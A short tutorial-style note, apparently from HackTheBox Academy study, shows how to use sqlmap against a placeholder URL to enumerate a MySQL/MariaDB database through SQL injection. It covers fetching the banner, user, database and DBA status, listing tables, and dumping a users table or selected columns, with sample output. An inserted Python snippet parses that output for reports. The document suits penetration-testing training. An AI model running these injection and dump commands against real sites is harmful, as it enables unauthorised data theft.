  • aldern00b

Database Enumeration with MySQL

Learning from HackTheBox Academy


Enumeration usually starts with the retrieval of the basic information:

  • Database version banner (switch --banner)

  • Current user name (switch --current-user)

  • Current database name (switch --current-db)

  • Whether the current user has DBA (administrator) rights (switch --is-dba)


Using sqlmap to do this:

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

[20:34:38] [INFO] the back-end DBMS is MySQL
[20:34:38] [INFO] fetching banner
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.3.23-MariaDB-0+deb10u1'
[20:34:38] [INFO] fetching current user
current user: 'user1@localhost'
[20:34:38] [INFO] fetching current database
current database: 'testdb'
[20:34:38] [INFO] testing if current user is DBA
[20:34:38] [INFO] fetching current user
[20:34:39] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[20:34:39] [INFO] fetched data logged to text files under '/home/htb-ac-560126/.local/share/sqlmap/output/144.126.206.249'
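
When writing up an assessment, the console output above is easier to work with as structured fields. The following is an added example, not code from the original post or from sqlmap itself; the function names parse_enumeration and review_notes are hypothetical, and the sample lines are constructed from the run shown above.

```python
import re

# Constructed sample: console lines in the shape shown in the run above.
SAMPLE = """\
[20:34:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.3.23-MariaDB-0+deb10u1'
[20:34:38] [INFO] fetching current user
current user: 'user1@localhost'
current database: 'testdb'
[20:34:39] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
"""

LOG_LINE = re.compile(r"^\[(\d{2}:\d{2}:\d{2})\] \[(\w+)\] (.*)$")
RESULT_LINE = re.compile(r"^([a-z][\w \-]*?): (.+)$", re.IGNORECASE)

def parse_enumeration(text):
    """Split console output into result fields and warning messages."""
    results, warnings = {}, []
    for line in text.splitlines():
        line = line.strip()
        log = LOG_LINE.match(line)
        if log:  # timestamped progress line, keep only warnings and errors
            if log.group(2) in ("WARNING", "ERROR", "CRITICAL"):
                warnings.append(log.group(3))
            continue
        res = RESULT_LINE.match(line)
        if res:  # "key: value" result line
            key, value = res.group(1).lower(), res.group(2).strip()
            if len(value) >= 2 and value[0] == value[-1] == "'":
                value = value[1:-1]  # drop the surrounding quotes
            results[key] = value
    if "current user is dba" in results:
        results["current user is dba"] = results["current user is dba"] == "True"
    return results, warnings

def review_notes(results):
    """Turn parsed fields into least-privilege notes for the report."""
    notes = []
    if results.get("current user is dba"):
        notes.append("application account has DBA rights; use a least-privilege account")
    if results.get("current user", "").split("@")[0] == "root":
        notes.append("application connects to the database as root")
    return notes

if __name__ == "__main__":
    print(parse_enumeration(SAMPLE))
```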

Enumerating tables

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

Enumerating Rows

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb

You can then dump only specific columns of that table, instead of all of them, by adding -C followed by a comma-separated list of the column names you want:

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

